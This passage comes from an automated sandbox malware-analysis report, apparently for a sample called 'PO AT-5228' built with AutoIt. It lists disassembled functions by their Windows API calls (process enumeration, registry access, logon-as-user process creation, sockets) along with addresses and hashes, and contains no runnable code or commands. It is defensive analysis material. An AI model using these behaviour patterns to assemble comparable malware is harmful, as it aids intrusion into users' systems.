                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wcsnicmp
                                                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                        • API String ID: 1038674560-2734436370
                                                                                        • Opcode ID: 86c03ff1bb85ece0ab4d366362d96741bb61785fcc47ad49d63b411cb4432498
                                                                                        • Instruction ID: cdc7abc0ff97038a5cd43a92ded71dca03f954fb46b06541c7a68da247b32804
                                                                                        • Opcode Fuzzy Hash: 86c03ff1bb85ece0ab4d366362d96741bb61785fcc47ad49d63b411cb4432498
                                                                                        • Instruction Fuzzy Hash: BC214C3150821167D720BB3CDC53EBB73D9EF76300F5084AAFA4997151EA55D942C395
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BA09CB
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BA09F1
                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00BA09F4
                                                                                        • SysAllocString.OLEAUT32 ref: 00BA0A15
                                                                                        • SysFreeString.OLEAUT32 ref: 00BA0A1E
                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00BA0A38
                                                                                        • SysAllocString.OLEAUT32(?), ref: 00BA0A46
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                        • String ID:
                                                                                        • API String ID: 3761583154-0
                                                                                        • Opcode ID: c07aa359213a5dfe24ce71bb22a5b539fda3b846c972379dfe919694ad8a221e
                                                                                        • Instruction ID: 70688c270800100ad8630b8bc1713932f93344e7a90b493f760140490261b126
                                                                                        • Opcode Fuzzy Hash: c07aa359213a5dfe24ce71bb22a5b539fda3b846c972379dfe919694ad8a221e
                                                                                        • Instruction Fuzzy Hash: 05215675614204AFDB10EFA8DCC9DAB77ECEF19360B408165F919CB2A1DA71EC418764
                                                                                        APIs
                                                                                          • Part of subcall function 00B7D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B7D1BA
                                                                                          • Part of subcall function 00B7D17C: GetStockObject.GDI32(00000011), ref: 00B7D1CE
                                                                                          • Part of subcall function 00B7D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B7D1D8
                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00BCA32D
                                                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00BCA33A
                                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00BCA345
                                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00BCA354
                                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00BCA360
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                                        • String ID: Msctls_Progress32
                                                                                        • API String ID: 1025951953-3636473452
                                                                                        • Opcode ID: a2e3048e9e6f3653eff9c9e54bd17f1810dad07da3dc4351030916423c3cc36f
                                                                                        • Instruction ID: 82c9999b836bb39f2502ea0cc6754ce35fd0f97c9b1fc38528c00e886974fa47
                                                                                        • Opcode Fuzzy Hash: a2e3048e9e6f3653eff9c9e54bd17f1810dad07da3dc4351030916423c3cc36f
                                                                                        • Instruction Fuzzy Hash: 681193B155011DBEEF155F60CC85EEB7F6DFF09798F014114BA08A60A0C6729C21DBA4
                                                                                        APIs
                                                                                        • GetClientRect.USER32(?,?), ref: 00B7CCF6
                                                                                        • GetWindowRect.USER32(?,?), ref: 00B7CD37
                                                                                        • ScreenToClient.USER32(?,?), ref: 00B7CD5F
                                                                                        • GetClientRect.USER32(?,?), ref: 00B7CE8C
                                                                                        • GetWindowRect.USER32(?,?), ref: 00B7CEA5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Rect$Client$Window$Screen
                                                                                        • String ID:
                                                                                        • API String ID: 1296646539-0
                                                                                        • Opcode ID: 3457dfce1c1077817e082b105808c16f6b307e7e25c9e002f4db249de7328358
                                                                                        • Instruction ID: 89218b3519f7503e80a41d1a37718a8927a63538b4a3051ada0336399255e1a1
                                                                                        • Opcode Fuzzy Hash: 3457dfce1c1077817e082b105808c16f6b307e7e25c9e002f4db249de7328358
                                                                                        • Instruction Fuzzy Hash: 8AB12B79900649DBDB10CFA8C5807EDBBF1FF08310F1495AEEC69AB254EB70AA50CB54
                                                                                        APIs
                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00BC1C18
                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00BC1C26
                                                                                        • __wsplitpath.LIBCMT ref: 00BC1C54
                                                                                          • Part of subcall function 00B81DFC: __wsplitpath_helper.LIBCMT ref: 00B81E3C
                                                                                        • _wcscat.LIBCMT ref: 00BC1C69
                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00BC1CDF
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00BC1CF1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                        • String ID:
                                                                                        • API String ID: 1380811348-0
                                                                                        • Opcode ID: 56007f572cbdb9a3c0709c4e4c88074e075c6faec2a43b148434bfdf3399662d
                                                                                        • Instruction ID: 9bd5c0c28d3ae0e1458677c15b32dfd11676cd51f9d5b33046d1db5f8e4bf844
                                                                                        • Opcode Fuzzy Hash: 56007f572cbdb9a3c0709c4e4c88074e075c6faec2a43b148434bfdf3399662d
                                                                                        • Instruction Fuzzy Hash: 92515D715043409FD720EF24C885EABBBECEF88754F00496EF58AA7251EB70DA04CB92
                                                                                        APIs
                                                                                          • Part of subcall function 00BC3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BC2BB5,?,?), ref: 00BC3C1D
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BC30AF
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BC30EF
                                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00BC3112
                                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00BC313B
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00BC317E
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00BC318B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                        • String ID:
                                                                                        • API String ID: 3451389628-0
                                                                                        • Opcode ID: 80dbc3feb0dedeaee1561cd187526b1e84b2c40779bae25c6b2e97e03c894a0c
                                                                                        • Instruction ID: 9af0b76db08ea17d818b6b0e8e7a69b933fd39abf0df30c2f534b93722cbd49c
                                                                                        • Opcode Fuzzy Hash: 80dbc3feb0dedeaee1561cd187526b1e84b2c40779bae25c6b2e97e03c894a0c
                                                                                        • Instruction Fuzzy Hash: 6F516C31608300AFC700EF64C895E6ABBF9FF89700F04899DF595972A1DB75EA05CB52
                                                                                        APIs
                                                                                        • GetMenu.USER32(?), ref: 00BC8540
                                                                                        • GetMenuItemCount.USER32(00000000), ref: 00BC8577
                                                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00BC859F
                                                                                        • GetMenuItemID.USER32(?,?), ref: 00BC860E
                                                                                        • GetSubMenu.USER32(?,?), ref: 00BC861C
                                                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 00BC866D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Item$CountMessagePostString
                                                                                        • String ID:
                                                                                        • API String ID: 650687236-0
                                                                                        • Opcode ID: 880629846b5d73d61b6d99afbfe254d6d4e14604060e43699ebc8d2c8ca66736
                                                                                        • Instruction ID: 0257b963ece2c2f2364c8a3d9b01b37f8feb8592086cc0f32cdfd66238ec0396
                                                                                        • Opcode Fuzzy Hash: 880629846b5d73d61b6d99afbfe254d6d4e14604060e43699ebc8d2c8ca66736
                                                                                        • Instruction Fuzzy Hash: 0F519D31A00615AFDF11EFA8C981EAEB7F4EF58310F1044A9E915BB351DF75AE418B90
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00BA4B10
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BA4B5B
                                                                                        • IsMenu.USER32(00000000), ref: 00BA4B7B
                                                                                        • CreatePopupMenu.USER32 ref: 00BA4BAF
                                                                                        • GetMenuItemCount.USER32(000000FF), ref: 00BA4C0D
                                                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00BA4C3E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                        • String ID:
                                                                                        • API String ID: 3311875123-0
                                                                                        • Opcode ID: 00a53abca6b22355aa08da592370cb9ed099c2facbdd5c779828997330dbddb5
                                                                                        • Instruction ID: d3436996cc140188b283f3143b8d1ecbf660ec9e6383c4ae4d261c39f625f708
                                                                                        • Opcode Fuzzy Hash: 00a53abca6b22355aa08da592370cb9ed099c2facbdd5c779828997330dbddb5
                                                                                        • Instruction Fuzzy Hash: F351D370609249EFCF20CF64C988BADBBF4EF86324F144199E4299B291E7F1D944CB61
                                                                                        APIs
                                                                                        • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,00BFDC00), ref: 00BB8E7C
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00BB8E89
                                                                                        • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00BB8EAD
                                                                                        • #16.WSOCK32(?,?,00000000,00000000), ref: 00BB8EC5
                                                                                        • _strlen.LIBCMT ref: 00BB8EF7
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00BB8F6A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$_strlenselect
                                                                                        • String ID:
                                                                                        • API String ID: 2217125717-0
                                                                                        • Opcode ID: 61b37753a21c295dc998936141a47021b53633e9e2eb9df3d90e9895b817691c
                                                                                        • Instruction ID: 6b419e6eaffa3ccd060e75f06b445b2c6c6247f7ed446365e78aae90c96669e4
                                                                                        • Opcode Fuzzy Hash: 61b37753a21c295dc998936141a47021b53633e9e2eb9df3d90e9895b817691c
                                                                                        • Instruction Fuzzy Hash: EC416E71600104AFCB14EB64C9D5AFEB7EEEB58310F104699F51A97291DFB4EE44CB60
                                                                                        APIs
                                                                                          • Part of subcall function 00B7B34E: GetWindowLongW.USER32(?,000000EB), ref: 00B7B35F
                                                                                        • BeginPaint.USER32(?,?,?), ref: 00B7AC2A
                                                                                        • GetWindowRect.USER32(?,?), ref: 00B7AC8E
                                                                                        • ScreenToClient.USER32(?,?), ref: 00B7ACAB
                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00B7ACBC
                                                                                        • EndPaint.USER32(?,?,?,?,?), ref: 00B7AD06
                                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00BDE673
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                        • String ID:
                                                                                        • API String ID: 2592858361-0
                                                                                        • Opcode ID: 003cf160d07936bbb37e9e383b61ce093fb4a91e8046d40bd7808cda9f1e5895
                                                                                        • Instruction ID: 25923f1cc20dca5338bdde13be057e103830c1587683b3ef9b8997df2cf66b1f
                                                                                        • Opcode Fuzzy Hash: 003cf160d07936bbb37e9e383b61ce093fb4a91e8046d40bd7808cda9f1e5895
                                                                                        • Instruction Fuzzy Hash: 54419371104201AFC721DF24DC84F7E7BE8EB59320F1846A9F9A88B2A1D7719945DB62
                                                                                        APIs
                                                                                        • ShowWindow.USER32(00C21628,00000000,00C21628,00000000,00000000,00C21628,?,00BDDC5D,00000000,?,00000000,00000000,00000000,?,00BDDAD1,00000004), ref: 00BCE40B
                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 00BCE42F
                                                                                        • ShowWindow.USER32(00C21628,00000000), ref: 00BCE48F
                                                                                        • ShowWindow.USER32(00000000,00000004), ref: 00BCE4A1
                                                                                        • EnableWindow.USER32(00000000,00000001), ref: 00BCE4C5
                                                                                        • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00BCE4E8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 642888154-0
                                                                                        • Opcode ID: a12675204d87bffd70a8e7a54b465daa070497abd4257b103602cf27d33918f9
                                                                                        • Instruction ID: b6a9d1618646c62f4b31ce45580f4c901aacc6ad305fbf76dd59db533ff27d71
                                                                                        • Opcode Fuzzy Hash: a12675204d87bffd70a8e7a54b465daa070497abd4257b103602cf27d33918f9
                                                                                        • Instruction Fuzzy Hash: 49413E34601141EFDB2ACF24C499FA87BE1FF09304F5881E9EA698F2A2C771E841CB51
                                                                                        APIs
                                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 00BA98D1
                                                                                          • Part of subcall function 00B7F4EA: std::exception::exception.LIBCMT ref: 00B7F51E
                                                                                          • Part of subcall function 00B7F4EA: __CxxThrowException@8.LIBCMT ref: 00B7F533
                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00BA9908
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00BA9924
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00BA999E
                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00BA99B3
                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00BA99D2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 2537439066-0
                                                                                        • Opcode ID: 8a8a13554fafb644854bdf8d4621b706777ea2e476487ca9ee889b5c54a4310c
                                                                                        • Instruction ID: 8a303c6592b0e924c7e3cf4733b8f5ddb0c0cfb1a3f9da777b344a7c834efc95
                                                                                        • Opcode Fuzzy Hash: 8a8a13554fafb644854bdf8d4621b706777ea2e476487ca9ee889b5c54a4310c
                                                                                        • Instruction Fuzzy Hash: 5A318F31A00105AFDB00AFA5DC85EAFB7B9FF45310B1480A9F914AB286DB74DE10DBA5
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,00BB77F4,?,?,00000000,00000001), ref: 00BB9B53
                                                                                          • Part of subcall function 00BB6544: GetWindowRect.USER32(?,?), ref: 00BB6557
                                                                                        • GetDesktopWindow.USER32 ref: 00BB9B7D
                                                                                        • GetWindowRect.USER32(00000000), ref: 00BB9B84
                                                                                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00BB9BB6
                                                                                          • Part of subcall function 00BA7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00BA7AD0
                                                                                        • GetCursorPos.USER32(?), ref: 00BB9BE2
                                                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00BB9C44
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                        • String ID:
                                                                                        • API String ID: 4137160315-0
                                                                                        • Opcode ID: bb7f1925da394e9e9a97b67e5f3cbe58500b2d6be59d2dcc14b7689b51a94d65
                                                                                        • Instruction ID: 5cba41ff0755ac5588dd90b0cadfade21baae686c118b2a88f4066bde58baace
                                                                                        • Opcode Fuzzy Hash: bb7f1925da394e9e9a97b67e5f3cbe58500b2d6be59d2dcc14b7689b51a94d65
                                                                                        • Instruction Fuzzy Hash: 5B31C172208355AFC720DF14DC89FAAB7E9FF89314F00096AF695D7191DAB1E904CB91
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00B9AFAE
                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00B9AFB5
                                                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00B9AFC4
                                                                                        • CloseHandle.KERNEL32(00000004), ref: 00B9AFCF
                                                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B9AFFE
                                                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00B9B012
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                        • String ID:
                                                                                        • API String ID: 1413079979-0
                                                                                        • Opcode ID: c707903b4af00e10a975cac71a232c66e6d88926c56159adacb230d711b69fe2
                                                                                        • Instruction ID: d8e6851dd3b5ead1426e4ba24e2f770fb840d0858ec82b1955b0212e9681782e
                                                                                        • Opcode Fuzzy Hash: c707903b4af00e10a975cac71a232c66e6d88926c56159adacb230d711b69fe2
                                                                                        • Instruction Fuzzy Hash: 7A215E72100249AFDF128F94ED89FAE7BE9EF44304F144065FA01A6161C7B69D21EBA1
                                                                                        APIs
                                                                                          • Part of subcall function 00B7AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00B7AFE3
                                                                                          • Part of subcall function 00B7AF83: SelectObject.GDI32(?,00000000), ref: 00B7AFF2
                                                                                          • Part of subcall function 00B7AF83: BeginPath.GDI32(?), ref: 00B7B009
                                                                                          • Part of subcall function 00B7AF83: SelectObject.GDI32(?,00000000), ref: 00B7B033
                                                                                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00BCEC20
                                                                                        • LineTo.GDI32(00000000,00000003,?), ref: 00BCEC34
                                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00BCEC42
                                                                                        • LineTo.GDI32(00000000,00000000,?), ref: 00BCEC52
                                                                                        • EndPath.GDI32(00000000), ref: 00BCEC62
                                                                                        • StrokePath.GDI32(00000000), ref: 00BCEC72
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
